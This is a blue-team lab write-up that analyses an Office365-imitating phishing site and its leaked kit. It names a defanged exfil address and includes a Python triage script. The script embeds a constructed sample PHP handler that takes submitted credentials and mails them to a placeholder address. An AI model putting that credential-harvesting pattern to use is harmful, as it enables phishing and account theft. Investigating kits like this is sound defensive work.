BlueTeamLabs Investigation: Phishy V1
Published: 12/6/2022
You have been sent a phishing link — It is your task to investigate this website and find out everything you can about the site, the actor responsible, and perform threat intelligence work on the operator(s) of the phishing site.
When attackers deploy phishing websites, their OpSec, or lack thereof, allows security researchers and investigators to download a copy of the phishing kit for further analysis. In this scenario, a full ZIP file containing the phishing kit was left in an open directory on the web server.
The phishing site is located at the URL
The page is an attempt at copying an Office365 secure document transfer website and asks the user to provide their O365 credentials to view the shared file.
The top left of the page says Microsoft Docs. While Microsoft Docs does exist, it hosts Microsoft's product documentation and is not used for document transfers. The website is also served over plain HTTP rather than HTTPS, which a legitimate Microsoft login page would use.
Viewing the page's HTML code reveals a suspicious PHP file named jeff.php, to which the credentials entered into the login form are sent.
The HTML comments contain the phrase Thanks to PHP Bloke. This text would be a good pivot for uncovering other phishing websites in the wild that use this kit, or a similar one.
Viewing the page's stylesheet, style.css, shows that the background behind the login form is an image named axCBhIt.png rather than HTML content.
The webpage background image
These factors, and others, combined with the non-Microsoft URL establish beyond doubt that this is not a legitimate Office 365 file transfer website but a phishing site.
When searching the website for more information, hxxp://securedocument[.]net redirects to hxxp://securedocument[.]net/cgi-sys, which is a default cPanel page.
The source of this page shows that it was copied from another website using HTTrack Website Copier.
Phishing operators will often redirect all non-phishing URLs to generic websites in an attempt to mislead analysts and automated scanning tools.
The operator of the phishing website left a copy of the phishing kit in .zip format at the URL
ubuntu@ip-10-0-3-0:~/Downloads$ sha256sum 0ff1cePh1sh.zip
jeff.php is used to process credentials submitted in the web form. The PHP source code shows that the credentials are sent to the email address boris.smets@tfl-uk[.]co. On submission of the credentials, the victim is then redirected to the legitimate website
index.html results in a redirect to index1.html along with a URL parameter derived from the current time using the
This phishing website will not actually work as intended, so the operator will not receive any credentials. In the HTML form on the main page, the email and password fields are given the names
passss respectively. However, jeff.php expects the variable names
pass1 to be passed from the submitted form. Because the handler reads keys that the form never submits, it never receives the values the victim typed, and the email it sends carries empty credentials.
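As an added example (not code from the challenge or from the kit), the following Python script performs the static checks made by hand above over a downloaded kit: it extracts the login form's action target and field names from the landing page, the $_POST keys read by the PHP handler, any HTML comments usable as pivots (such as the Thanks to PHP Bloke string), and any e-mail addresses or Location headers in the handler, then reports whether the submitted field names and the expected keys actually match. The two sample files are constructed for this example; only jeff.php, the field name passss, the key pass1 and the comment text come from this write-up, while the e-mail field names, the recipient address and the redirect target are placeholders.

```python
"""Static triage of a downloaded phishing kit.

Example code added to this write-up; not part of the kit or the challenge.
Only jeff.php, the form field passss, the $_POST key pass1 and the comment
"Thanks to PHP Bloke" come from the write-up. Every other name in the sample
files below (email field names, recipient, redirect target) is a placeholder.
"""
import re

# Constructed sample landing page (not the real kit's index.html).
# "email_form" is a placeholder; the write-up does not show the email field name.
INDEX_HTML = """\
<!-- Thanks to PHP Bloke -->
<form method="post" action="jeff.php">
  <input type="email" name="email_form">
  <input type="password" name="passss">
  <button type="submit">View document</button>
</form>
"""

# Constructed sample handler (not the real jeff.php).
# "email_php", the recipient and the redirect target are placeholders.
JEFF_PHP = r"""<?php
$email = $_POST['email_php'];
$pass  = $_POST['pass1'];
$to = "operator@example.invalid";
$body = "Email: " . $email . "\nPass: " . $pass;
mail($to, "New login", $body);
header("Location: https://login.example.invalid/?" . time());
?>"""

FORM_ACTION_RE = re.compile(r'<form\b[^>]*\baction\s*=\s*["\']([^"\']+)["\']', re.I)
INPUT_NAME_RE = re.compile(r'<input\b[^>]*\bname\s*=\s*["\']([^"\']+)["\']', re.I)
HTML_COMMENT_RE = re.compile(r'<!--(.*?)-->', re.S)
POST_KEY_RE = re.compile(r'\$_(?:POST|REQUEST)\s*\[\s*["\']([^"\']+)["\']\s*\]')
EMAIL_RE = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')
LOCATION_RE = re.compile(r'header\s*\(\s*["\']Location:\s*([^"\'\s]+)', re.I)


def parse_form(html):
    """Return (action target, [input field names]) of the first form on the page."""
    action = FORM_ACTION_RE.search(html)
    return (action.group(1) if action else None, INPUT_NAME_RE.findall(html))


def html_comments(html):
    """HTML comments, which often carry kit author tags or HTTrack mirror notes."""
    return [c.strip() for c in HTML_COMMENT_RE.findall(html)]


def php_post_keys(php):
    """Request keys the handler reads, in order of first appearance."""
    return list(dict.fromkeys(POST_KEY_RE.findall(php)))


def php_exfil(php):
    """E-mail address literals (exfil recipients) and redirect targets in the handler."""
    return {"emails": sorted(set(EMAIL_RE.findall(php))),
            "redirects": LOCATION_RE.findall(php)}


def field_mismatch(form_fields, post_keys):
    """Fields the form sends but the handler ignores, and keys the handler
    reads that the form never sends (the second list breaks the kit)."""
    sent, read = set(form_fields), set(post_keys)
    return sorted(sent - read), sorted(read - sent)


def triage(html, php):
    """Combine the checks into one report for the landing page / handler pair."""
    action, fields = parse_form(html)
    keys = php_post_keys(php)
    unread, missing = field_mismatch(fields, keys)
    return {
        "form_action": action,
        "form_fields": fields,
        "post_keys": keys,
        "unread_fields": unread,
        "missing_keys": missing,
        # True only if every key the handler reads is actually submitted.
        "handler_gets_all_fields": not missing,
        "pivots": html_comments(html),
        **php_exfil(php),
    }


if __name__ == "__main__":
    for key, value in triage(INDEX_HTML, JEFF_PHP).items():
        print(f"{key}: {value}")
```

Run against a real kit, point the two string constants at the downloaded index page and handler; the missing_keys list is the quickest way to confirm the broken-form finding above, while pivots and emails give the strings to search for across other samples.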